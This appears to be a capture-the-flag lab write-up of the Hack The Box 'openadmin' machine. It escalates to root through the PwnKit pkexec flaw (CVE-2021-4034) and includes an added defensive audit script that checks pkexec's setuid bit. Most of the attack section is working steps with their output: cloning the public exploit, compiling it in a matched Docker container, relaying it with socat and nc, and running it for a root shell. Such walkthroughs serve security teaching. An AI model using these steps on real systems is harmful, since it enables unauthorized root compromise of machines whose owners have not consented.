CVE-2021-4034


PEAS discovered that the target system is vulnerable to CVE-2021-4034. The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec allows non-privileged processes to communicate with privileged ones, and it instruments legitimate, authorized uses of privilege escalation, similar to sudo.

A memory corruption flaw exists when pkexec is executed with no arguments. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
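Because the flaw only matters while pkexec is setuid root, a defender can audit that bit and the installed Polkit package. The following POSIX shell audit is an added example, not part of this writeup; the function names are hypothetical helpers, and a patched pkexec is still setuid, so the package version must be compared against the vendor advisory.

```shell
#!/bin/sh
# Added example (not from the original writeup): defender-side audit for
# CVE-2021-4034. Function names are hypothetical helpers.
#
# pkexec is only a privilege-escalation path because it is setuid root.
# A patched pkexec keeps that bit, so the real fix is the vendor package;
# dropping the bit is the published interim mitigation until it is applied.

# Print "absent", "setuid" or "no-setuid" for the given binary path.
pkexec_status() {
    path="${1:-/usr/bin/pkexec}"
    if [ ! -e "$path" ]; then
        echo absent
    elif [ -u "$path" ]; then      # POSIX test: set-user-ID bit present
        echo setuid
    else
        echo no-setuid
    fi
}

# Interim mitigation: remove the setuid bit (pkexec then refuses to run
# rather than escalating). Returns non-zero if the bit is still present.
drop_pkexec_setuid() {
    chmod u-s "$1" && [ ! -u "$1" ]
}

# On Debian/Ubuntu, show the installed policykit-1 version so it can be
# compared against the fixed version named in the vendor advisory.
policykit_version() {
    command -v dpkg-query >/dev/null 2>&1 || { echo unknown; return; }
    dpkg-query -W -f='${Version}' policykit-1 2>/dev/null || echo unknown
}

# Report for the running host; only modifies pkexec when "--mitigate" is passed.
audit_host() {
    status=$(pkexec_status /usr/bin/pkexec)
    echo "pkexec: $status (policykit-1 version: $(policykit_version))"
    if [ "$status" = setuid ] && [ "$1" = "--mitigate" ]; then
        drop_pkexec_setuid /usr/bin/pkexec && echo "pkexec: setuid bit removed"
    fi
}

audit_host "$@"
```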

Exploit: PwnKit


I found an exploit online; I will download it to Kali.

www-data@openadmin:/tmp$ gcc

Command 'gcc' not found, but can be installed with:

apt install gcc
Please ask your administrator.

Since the target system has no compiler installed, I have to compile the exploit on another machine.

Docker Exploit Development


www-data@openadmin:/opt/ona/www$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

The target system is Ubuntu 18.04.3 LTS (Bionic Beaver) and has ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27.

┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ docker run -it --entrypoint "/bin/bash" --name ubuntu18.04 ubuntu:18.04

I first create an Ubuntu 18.04 container, the closest match to the target system.

root@4e9b62310146:~# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

The first thing to do once inside the container is to check the GLIBC version, to make sure the compiled exploit will work on the target system.

root@4e9b62310146:~# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Then I updated the package index and installed the necessary tools.

root@4e9b62310146:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034

I then grabbed the exploit package.

root@4e9b62310146:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.

Compile.

root@4e9b62310146:~/CVE-2021-4034# cd .. ; tar -czvf CVE-2021-4034.tar.gz CVE-2021-4034

Archive the whole package again for delivery.

┌──(kali㉿kali)-[~/…/htb/labs/openadmin/kernelbuster]
└─$ socat tcp4-listen:2222,fork tcp4:$IP:2222

On Kali, I set up a network forwarder. This receives the archive from the container and forwards it to the target system.

Then I set up a listener on the target system so that it can receive the archive.

root@4e9b62310146:~# nc 10.10.14.6 2222 < CVE-2021-4034.tar.gz

Delivering the archive to the Kali network forwarder.

Archive received on the target system.

Exploitation


www-data@openadmin:/tmp$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

I extracted the archive and changed the working directory to the exploit package.

www-data@openadmin:/tmp/CVE-2021-4034$ ./cve-2021-4034
#
# whoami
root
# hostname
openadmin
# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:a730  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:a730  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:a7:30  txqueuelen 1000  (Ethernet)
        RX packets 1662864  bytes 310755350 (310.7 MB)
        RX errors 0  dropped 112  overruns 0  frame 0
        TX packets 1662119  bytes 769215981 (769.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 14608  bytes 1138920 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14608  bytes 1138920 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
# 

Executing the exploit resulted in a root shell: system-level compromise.